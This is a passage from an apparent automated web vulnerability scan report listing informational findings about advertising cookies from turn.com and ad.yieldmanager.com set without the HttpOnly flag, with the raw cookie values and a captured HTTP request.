Xtpsdy6ax_mGBSfFmQ_yHDdekCqCUBFYqyi1fHJyWiOfcfMTfgr4RpaCyPW_NRBa32FhMmG9vYGefuwSJ954i6NepjOZKvS1xYZ0Ss4Q0D1A3NBoQyX74acgH1t-jhoUfZVFCNnao7o-KEpvjqYDs5soT116oq-KJHQhjQmU4bTdez02J9dQy-ZN7OOs-kGRGl7xpemvhGQ8hzIqlr1IrYQxp-xUYgFsDPAGl-fbgR48rnFrJh-3J1YLh96s2Sov-e5Z1o1RvdHABpFM3tD1v5DXCzZ4xxZ_RffFsDnywN1GkkZV_5Uv_RIvgSU7i6xm2dvbjnkHZoee2LjdKxjrsrZzN8Fjq5xh8lQ54K_u30ofXMDvN81pDaQWZ60S1K8hgQ0QQAeUZzYxmcCX-jt_KTaaPcVoJOvIBlFFRgh0aGkP2j5peH6Nkss0iuJOnMv3-09gfh2rrcKik1-oIrPtZSMAqqQ8JflUQTdxXpAW4Vnpqg7w4_2s4Bpo2uZfDxG0VZFB88Wk-VgL9u-XI58uBKvrz56O3iu9p-J24_EGM6hyagMn2YEmkLg5zZbK-JWIvvwrhwhPnDUjHFB6vhhdIIEEGSp2RC01-sirwoYxJf3ssEn49prH-YYFJ8WZD_IcN16QKoH0UI20YAgyxkHiw8lIAx_mnb-jXXCSXp2vVTXzmr9pZcL6p-XT3jN85vkgaZ8vUd92-2pnQD2n21e-ITIgQL_3JfvhpyAfW36OGhR9lUUI2W0_XCWcb8zsqQ8DimFX-Uu8v7HHrFL4nIbaIJQ_o1sPTa-Xsvzoz7XjqWNTCt3rZYrf92fSurscMt_1SV35mtBiAWwM8AaX59uBHjyucWslDB1wwanEOL6qzMCUQo0ieVG90cAGkUze0PW_kNcLNnm1cdjsO0JR2cllZViOXnQ3uVf8tWzflWdHziO5SokVWQdmh57YuN0rGOuytnM3wWK2DU6rMC-wJwy5QPx_qifTzWkNpBZnrRLUryGBDRBAB5WYyOFQ5ZRNL4sHU3RtcuUGDyFx-piXtjZp5ekRGkYdz2wXbubEN_3mjRNBG_Idw8LkqJ96VKyr7U-y-sK8_Lwl-VRBN3FekBbhWemqDvDiLN5_5A8LFSovW3C4K386c_Ql6lVvJ2R2O4nWyUN5iRLeK72n4nbj8QYzqHJqAyfbLD2N_CM7u1mydoDMYTC_mprH-YYFJ8WZD_IcN16QKoM2VicvKbeYEcyMla3yEoQ2RmR_rbYcUwB-9MYK1HnZwScQ9V5hHmJlTe-T75MjzqreTn2hkb9oAtGT_7YF8ZSHJfvhpyAfW36OGhR9lUUI2tqCUb5yc9vn09nLuvbx5GXq1-cHJUfnrcooYGbPAvcjTa-Xsvzoz7XjqWNTCt3rZ7d3RTRs3cZwFLR9Y320UThiAWwM8AaX59uBHjyucWslF1uoT-2LMDmY4614N6HcfVG90cAGkUze0PW_kNcLNnghS3x9ESIRPKJqzarj28HG_LjieMq13s3cgAdN8xM7aQdmh57YuN0rGOuytnM3wWD1crAQAhXFQgOVLYlHadeHzWkNpBZnrRLUryGBDRBAB4AW9z3L32rHXq7G7Z3kib1OoXqrfdwtdG7Pp8fEmP0RO1BgA0BJmNitU_2NEj2fHdezpP7kSHcGVCNOXldgVDwW4Q7G96F_uxzfd0sMvSg4z5M54jeAtYCpK6P6H7YLfn1DM2JHon2Lg_l7lDsiT8znxJAatjK_8wTO5tRuZ3XmAl8yAkjzMu60avymcp27zO-9MBVRaOICeVmt0y5elVS00w8o4kTkeT0M3Rv13tNe-KMtsmN_rfKIZLBsrIbZ0Ab_1obB3eU-U6Z0afsrnZftOdxqgu9zaA9BEiA6GyCALmKUKKFE7ohNDi6PefIl64Pb4jyDZez37XoLDFRz9aXnoPz5SThj_DvdguRRNEucYg00aQbrhHmId6TwPhXu76yC6Xpua0XHhwiiO6LimyFMzyKuXBH_zaKGoR-cizFPU5q-qS65e77PR9HaVucWwVvnmlsEQ_Atbdsc7UFm5r_xNRMntMj0v83tuXwoxESvmHp0q8wlx1yaN_b8Qgsy2AKyQi2Rbow26cVTOuaTA2O7EcPEhO-noAo46R_e24qwGCrSBorbtNH5M4cO413R5q6ohebL9J2uZQCBqdE68xlu-7BMsZILlJ1GaKK7JeQ0NX3h3aJ1949KHw8E3HcObqqagiCGVgCdK45TXMokXLNbLuay2_Mt8CFITD7Jngr96fRVjMkjVdVwCfn3jY17LdcA89lw_nuxmuMlq4JPuMvBgd7KD-dSBKfWGSR1M5LiNft9usTHYdghvjPaGdOl0oeDPIpDvfXPcF_hHNKAWi9PW-kET4hoTQkmFc9qp_NZWUKqCzXEjua3bdNL3CHoIF3JRLm-lzLvmU4Mu5vDpETlLJNWSrKQ378tsap95j5WqVoBRRvw_8l_9s_rOZMLzYU2TbhE8zQ2PWHJZhQi88rAm7PyPAWBG8bc1l4eZXJ7qI6SVzjsUIQsGpeiuqy0wZsvJnUfvCegfWPkjFXygnBsrvjdzgzubbc5BofE4fxcMPpyUlfN1EzgUZ2v0L4yTh1VNDYPhttMQaQJ-b77UV8QBUBB42JBqSKatn3vpXyL6TOAicxCOf2XgpY5js6GsmnvWs8SyvDw_QeTyHBaWJSPcsWWbSJo-8gq8nYPQ6BzbnNtDWU-qVEEawvsFJvVrgq6UuEmTyoYjhtb_gPFxhiDjF0OxifaKQDH01ro4Wwg; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
fc=vaJ6aoyywMi4NqtlKsU64lht9mm7-E1xIImTItPA1urbQqNNvLUmxUNQQBPMgfFerRqQpaKBKyof5NYMw3qm97r0GrmP14kIO_P1S_Kd3R7cCRX28vmQ734FGllQxEga7WNeyCp05SdctLfte-TCTbsP4cT5ImSiiIJxR5UGOwfPwbRnR2LLF13q12TckziOwF6Kobi_0otjkQAmScc-TZuyzRHZQdTq6XVtL0hM6YVgYsYM5nTvlmY3l5bk4g84r-nKZ1rQQJqck6Yvy9KW3W91gPk0ifU2Wnpfq4coyDul4J5x1VDDQsLplNf7fxlsqch1kSkJnLuIM5kQxIBrA1AAJ5E2NNXlrPeQUMuax8t_TTqS7k2UZnQ2_qo9uJoS; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
pf=A62R0s-qigjspkCN3ccCJZUfVYhQeEUQKVt0ATDwEBd4MaYm-hBniQ2x_WbJU5VofR8HsN28iFo6HdZJoYg636sNildKFCNXpyKvUiTLZIHjhKTZoZfl0UmM4YAE9VltLd4zaBhLXK6dA3tQW6GTY_mhMXcZkp2CGVOUe9dNA1dLc3SbvsAbpvKUhZ_1F-gMqt697FUnnCyNJa5eXuHVqkYk9oOpEEnBnxokixh0TAcnTloknPCKo_m2KWZ0znMHGX1FGgNaH1QNLww2o9FWDf92KpcEjM9puswoJnlptpg_Ua1SMLgL8e4oitE3gQEt0IYL2CsvvDQbzbzoZi58WVFU2_HfnlKzH2WjiB0I74yjr5MEZ55HOjknaleEn8uqphJLAkUsMWh_vdfMYZ4DsAqVswvpKACSML7qepV3TXcVzrbaB5_N9dG_mUB3DBQpHCwQOntCh3wzWqFyTO9sCmbID1pM7GdJCmEvQvhgCerVKPuxNShLT7BdA74b9PIpJFJv0bKrvIAXiY5kxeBqDZM9McQOVbCG47DlR2tl0RZrXlLfPhjB-LAv0hBAzyAT8WyNLsptBsE0pyyMNzm8KTDTfIrxKwKcgVAF0j3DpG-Ah_L2mBEhIVZyz3v4hUv82NTphEWhwEZTsAeCcCRJGQ16FhMiQjewtL7hTKHHtYomz6Mgv9ntnMipgM9tObOSRi5sdEi6v2SSHlqkNcZ1Insylw9OuZiK2Z9Z1ZInGi2VyX45sYdTfBGAwKx_QKsRDOFWXyC8BwuYcP4g_M8_5sW-t1RZ1RZoZx7lrsMhMHodIDnIK6ly468s-StQw1rNNbnQrRiBaZdoox-8l-4ssS8cnCaJbHr6avLClL1L-ZgHVS17gTosFV1LPoOJqMoPVx8L9V4GQ55oLDrsRz9rTx9FeqPBBvBYGO1SdqujwXgi0vu0SmNRlepXu23ylR2425RDJExopm1fmCCVJh_u9NPFwH371j224eEs7ZO_Ajtb9hEO5hT0MYYwff0a4aDJ8dVm-HlCOmQllIxHHVPmqo5POfQNhu-I5BtsxdNdff3L0rrE_rQqKLBssQ48bm9_mXQzReNjx3lXy785TIo-y5veNkje6bZOCdvzPqpApnQKiSIwki5f-ITER4DSY4219M583u_ZPKiH6Ea4p59q66AhR0SCoMm0IXZ_t5_lhYgWzvjS6P-UHDNUBWN18PSjuJp9aVntFwJIXFrQO8XwyhujvEUOLmkRuJtqn5C1FWr3rHK_ua4i4QGywfYupaV2fuScMz9nUn-9DR4XMyfjq6f9MS-DaFKt2RaSz_BBjJKiIA7uafV8NNMTbjh0U1qug__vmYjXW251NXxsKK_4qFzSypNenDnJ6HQ-3068v6hBJfEyf0yd-2fLUXx6iqh9wMyw-RaWvEndJRgsZP3zOckxnpD1Bh0doyFi9Md6WZu8mx8U3kUMFDpZ0SqI-5d7X_-8-uyf42RpEQk10dwHo6E6IPJGWiCATH5pcXIPM9vPxG-uEMBzxe02yDopCwxH8LV8wxWtacb8pPjx7gKH5cGBR1KqovJK3yVBhrs2V7Q; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.50. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ih="b!!!!R!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1CPe!!!!#=!=eH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; path=/; expires=Sat, 11-May-2013 12:02:06 GMT
vuday1=!!!!#N==#3P+HYn; path=/; expires=Fri, 13-May-2011 00:00:00 GMT
pv1="b!!!!<!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~!#vtn~!$m%+!1CPe!%]D<!!!!$!?5%!$U*40!ZZ<)!!jYm!'iBj~~~~~~=!=eH~M.jTN"; path=/; expires=Sat, 11-May-2013 12:02:06 GMT
BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?AAAAAOmuGgC5qoYAAAAAAPdTIgAAAAAAAgAAAAAAAAAAAP8AAAAFCD6tBwAAAAAAEwUtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADsRBEAAAAAAAICAgAAAAAAaJHtfD81IkBoke18PzUiQAAAAAAAAAAA..-.J2RBLUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4vrjsurAUCtON08oY0hycui5W9Iusk.A73L85AAAAAA==,,http%3A%2F%2Fpepperhamilton.com%2F%3Fepl%3D7vc_zcf-qaineur8rrn2eld1uychhmipkrv4hu2icszqhp18zi-zqhke8c0nditmgf6myi8crelfjtduqvtegsrgy6_nrn4uxmreqxnqebzqbc2utdekuiaxnrmz27autdpfjeh2pryyomlkmtkon5opgpo8kgkayibaqbf1acaq3oe_aadgfwuaaeca2wgaako-cvbzuyzzqte2afpcgwaaapa,Z%3D0x0%26anmember%3D541%26anprice%3D%26y%3D29%26s%3D1748713%26_salt%3D1407533862%26B%3D10%26r%3D0,a5755db2-7c8f-11e0-be3e-1cc1de0869c8 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; ih="b!!!!Q!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; pv1="b!!!!:!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~"; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; bh="b!!!%+!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!,=!2<(!!0O<!!!!5=!2<(!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!2=!2<(!!J<E!!!!2=!2<(!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!3=!2<(!!q:E!!!!0=!2<(!!q<+!!!!1=!2<(!!q</!!!!1=!2<(!!q<3!!!!1=!2<(!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!,<yq][!!ucq!!!!5=!2<(!!vRm!!!!,=!2<(!!vRq!!!!,=!2<(!!vRr!!!!,=!2<(!!vRw!!!!5=!2<(!!vRx!!!!,=!2<(!!vRy!!!!,=!2<(!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!,=!2<(!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!,=!2<+!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!,=!2<(!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!,=!2<(!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!,=!2<(!#MTF!!!!,=!2<(!#MTH!!!!,=!2<(!#MTI!!!!,=!2<(!#MTJ!!!!,=!2<(!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!2=!2<(!#SF3!!!!2=!2<(!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!,=!2<(!#UDP!!!!2=!2<(!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!,=!2<(!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!,=!2<(!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!,=!2<(!#tM)!!!!,=!2<(!#tn2!!!!,=!2<(!#uE=!!!!#<x9#K!#uJY!!!!2=!2<(!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!,=!2<(!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!/=!2<(!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!